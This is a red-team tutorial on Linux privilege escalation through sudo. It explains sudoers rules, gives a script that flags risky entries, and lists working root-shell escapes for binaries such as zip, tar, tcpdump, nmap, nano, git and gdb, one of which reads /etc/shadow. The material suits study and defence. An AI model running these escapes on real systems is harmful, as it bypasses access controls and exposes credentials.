  • Abusing SUDO Advance for Linux Privilege Escalation

    Index

    1. What is SUDO?
    2. Scenario.
    3. Sudoers File Syntax.
    4. Exploiting SUDO
      • zip
      • tar
      • strace
      • tcpdump
      • nmap
      • scp
      • expect
      • nano & pico
      • git
      • ftp/gdb

    What is SUDO?

    The sudo (Substitute User and Do) command lets an administrator delegate privileges to users while keeping a log of what they run. In other words, a user can execute a command as root (or as another user) by entering their own password instead of root's password, or with no password at all, depending on the sudoers configuration. The rules that decide whether access is granted live in the /etc/sudoers file (and in the files it includes from /etc/sudoers.d).


    Scenario.

    During a red team engagement we sometimes end up in a situation where we need to escalate our privileges to root or to another user. If the current user has been granted sudo rights on a binary that can spawn a shell or execute arbitrary commands, an attacker can use that sudo permission to obtain a shell as the target user.


    Sudoers File Syntax.

    root ALL=(ALL) ALL

    Explain 1: The root user can run sudo on ALL hosts, acting as ALL (any) users, and run ALL (any) commands.

    The first field is the user (or %group) the rule applies to, the second is the host on which the rule applies (ALL matches every host, which is what you see on a single machine), the third, in parentheses, is which users the invoker may act as, and the last is the list of commands the invoker may run with sudo. An optional tag such as NOPASSWD: can be placed in front of the command list.

    touhid ALL= /sbin/poweroff

    Explain 2: The above rule lets the user touhid, on any host, run /sbin/poweroff as root (the default run-as user when the parentheses are omitted) after entering touhid's own password.

    touhid ALL = (root) NOPASSWD: /usr/bin/find

    Explain 3: The above rule lets the user touhid, on any host, run /usr/bin/find as root without a password. Because find can execute arbitrary commands through -exec, a rule like this is equivalent to handing out a passwordless root shell.


    Exploiting SUDO Users.

    To exploit a sudo user you first need to find out which commands the user is allowed to run:
    sudo -l

    The above command lists the commands the current user may run with sudo, the user each command may run as, and whether a password is required.

    In our scenario, sudo -l shows that the user may run all of the binaries below as root without a password.

    Let's take a look at the binaries one by one (only those mentioned in the index) and escalate privileges to the root user.
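    The following triage script is an added example and is not part of the original post or of any tool the post cites. It parses the output of sudo -l, here a constructed sample that reuses the rules from the syntax section above (the user name touhid, the paths and the argument to tcpdump are assumptions), and flags every allowed command whose basename is one of the binaries covered in the rest of this page, plus the special command ALL, so that a long sudo -l listing can be checked at a glance instead of by eye.

```shell
#!/bin/sh
# Added triage helper (not from the original post): parse `sudo -l` output
# and flag allowed commands whose basename is a binary known to give a shell.

# Constructed sample of `sudo -l` output; not captured from a real host.
# The rules mirror the ones used in the sudoers syntax section of the page.
SAMPLE_SUDO_L='Matching Defaults entries for touhid on this host:
    env_reset, mail_badpass, secure_path=/usr/sbin\:/usr/bin\:/sbin\:/bin

User touhid may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/zip, /bin/tar, /usr/sbin/tcpdump -i eth0
    (ALL : ALL) /usr/bin/git, /usr/bin/nano
    (root) /sbin/poweroff
    (root) /usr/bin/id'

# Basenames covered on this page (plus find, which the syntax section grants).
ESCAPABLE='zip tar strace tcpdump nmap scp expect nano pico git ftp gdb find'

# Read `sudo -l` output on stdin; print "<basename><TAB><rule>" for each hit.
risky_sudo_rules() {
    # Rule lines are the ones that begin (after indentation) with "(runas)".
    grep -E '^[[:space:]]*\(' | while IFS= read -r line; do
        rule=$(printf '%s\n' "$line" | sed -E 's/^[[:space:]]+//')
        # Drop the "(runas)" group and any leading tags (NOPASSWD:, SETENV:, ...).
        rest=${line#*)}
        cmds=$(printf '%s\n' "$rest" | sed -E 's/^[[:space:]]*([A-Z_]+:[[:space:]]*)*//')
        # What remains is a comma-separated command list; entries may carry arguments.
        printf '%s\n' "$cmds" | tr ',' '\n' | while IFS= read -r entry; do
            set -- $entry                # word-split the entry: $1 is the program path
            [ $# -gt 0 ] || continue
            if [ "$1" = ALL ]; then      # ALL means any command: trivially root
                printf 'ALL\t%s\n' "$rule"
                continue
            fi
            base=${1##*/}
            for known in $ESCAPABLE; do
                if [ "$known" = "$base" ]; then
                    printf '%s\t%s\n' "$base" "$rule"
                    break
                fi
            done
        done
    done
}

# Stand-alone run: print the risky rules found in the constructed sample.
printf '%s\n' "$SAMPLE_SUDO_L" | risky_sudo_rules
```

    On a real target, replace the sample with the live output (sudo -l | sh thisscript.sh after removing the stand-alone run at the bottom, or simply pipe into risky_sudo_rules). The script only looks at the program name; a rule that pins arguments (for example /usr/bin/find /var/log -name '*.log') is still flagged, so read the full rule before deciding that a hit is exploitable.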


    Using zip command

    $ sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"

    /tmp/test must exist (any file will do). -T tells zip to test the archive after creating it, and --unzip-command replaces the unzip program used for that test with our own command, which zip runs as root; zip appends the archive name as an extra argument, which sh -c happily ignores.

    Using tar command

    $ sudo tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash

    The option is --checkpoint-action (the original text had it without the hyphen, which tar rejects). --checkpoint=1 makes tar emit a checkpoint after every record, and the exec action runs the given program as root at each checkpoint.

    Using strace command

    $ sudo strace -o/dev/null /bin/bash

    Using tcpdump command

    $ echo $'id\ncat /etc/shadow' > /tmp/.shell
    $ chmod +x /tmp/.shell
    $ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell -Z root

    -G 1 rotates the capture file every second, -z runs the given program after each rotation with the rotated file name as its only argument (so the script must ignore it), and -Z root keeps that program running as root instead of letting tcpdump drop privileges. Replace eth0 with an interface that exists on the target.

    Using nmap command

    $ echo "os.execute('/bin/sh')" > /tmp/shell.nse 
    $ sudo nmap --script=/tmp/shell.nse

    NSE scripts are Lua, so os.execute gives a root shell. Old nmap releases (2.02 to 5.21) also had an --interactive mode in which !sh spawns a shell.

    Using scp command

    $ sudo scp -S /path/yourscript x y:

    -S sets the program scp uses to open the SSH connection, and it is only invoked when one side looks remote, hence the trailing colon on the destination (with two local paths scp just copies the file). The script must be executable and is called with ssh-style arguments it should ignore; its stdin and stdout are pipes, so a shell started from it should read and write on stderr.

    Using expect command

    $ sudo expect -c 'spawn /bin/sh;interact'

    The binary is expect (the original text misspelled it as except); spawn starts the shell as root and interact hands the terminal over to it.

    Using nano command

    $ sudo nano -s /bin/bash

    Type your command into the buffer and hit CTRL+T. The lowercase -s sets the spell-checker program; CTRL+T runs that program on a temporary copy of the buffer, so /bin/bash executes whatever you typed as root. pico takes the same option.

    Using git command

    $ sudo git help status

    type:  !/bin/bash

    git shows the manual page through the pager (less), and ! at the less prompt runs a shell command with the pager's privileges, here root.

    Using gdb/ftp command

    $ sudo ftp

    type :  !/bin/sh

    Both ftp and gdb have a built-in shell escape: at the ftp> prompt ! runs a shell, and at the (gdb) prompt ! (an alias of the shell command) does the same, so sudo gdb -q followed by !/bin/sh also gives a root shell.

  • Original source: https://www.cnblogs.com/hack404/p/11288454.html